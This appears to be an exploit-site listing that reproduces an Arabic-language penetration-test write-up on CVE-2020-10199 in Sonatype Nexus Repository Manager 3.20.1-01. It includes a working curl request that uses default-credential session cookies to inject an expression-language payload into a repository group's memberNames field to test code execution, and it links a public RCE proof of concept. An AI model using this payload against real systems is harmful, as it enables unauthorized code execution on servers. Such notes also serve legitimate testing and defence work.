Sploitus

Exploit for CVE-2020-10199

kitploit · 2026-08-25

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FINN79426-CVE-2020-10199
# CVE-2020-10199

في السابق أثناء اختبار الاختراق، واجهت بيئة هدف تحتوي على Nexus Repository Manager، وواجهت بعض المشاكل لكن في النهاية حصلت على شيل.

سأقوم بتوثيق ذلك بإيجاز، ليسهل الرجوع إليه مستقبلاً إذا لزم الأمر.

* * *

الإصدار المستهدف: Sonatype Nexus Repository Manager OSS 3.20.1-01

* * *

تم استخدام PoC لاختبار تنفيذ الأكواد للتأكد من وجود الثغرة. (ملاحظة: كانت هناك جلسة مسجّل دخولها، لأنه تم اكتشاف مشكلة بيانات الاعتماد الافتراضية في البيئة المستهدفة)

![poc_test](https://assets.kitploit.com/production/public/readmes/50032/33ff8d8d5de3a154780bdf3b51d5e984a9ddfc526442c3863d0280ae9e8ba493.png)

root@kitploit:~
    
    
    curl -i -s -k -X $'POST' \
        -H $'Host: vulnerable.host:8081' -H $'Content-Length: 211' -H $'Content-Type: application/json' \
        -b $'NX-ANTI-CSRF-TOKEN=0.556095932101016; NXSESSIONID=1dde28fd-1606-4ee3-9c6a-0a2f10791f4b' \
        --data-binary $'{\x0d\x0a    \"name\": \"internal\",\x0d\x0a    \"online\": true,\x0d\x0a    \"storage\": {\x0d\x0a        \"blobStoreName\": \"default\",\x0d\x0a        \"strictContentTypeValidation\": true\x0d\x0a    },\x0d\x0a    \"group\": {\x0d\x0a    \"memberNames\": [\"$\\\\A{7*7}\"]\x0d\x0a}\x0d\x0a}' \
        $'http://vulnerable.host:8081/service/rest/beta/repositories/go/group'
    

* * *

جرّبت PoC الخاصة بـ RCE المتداولة على الإنترنت، لكنها لم تنجح.

يمكن ملاحظة أن المخرجات أعادت الـ payload كما هي دون تغيير.

https://github.com/jas502n/CVE-2020-10199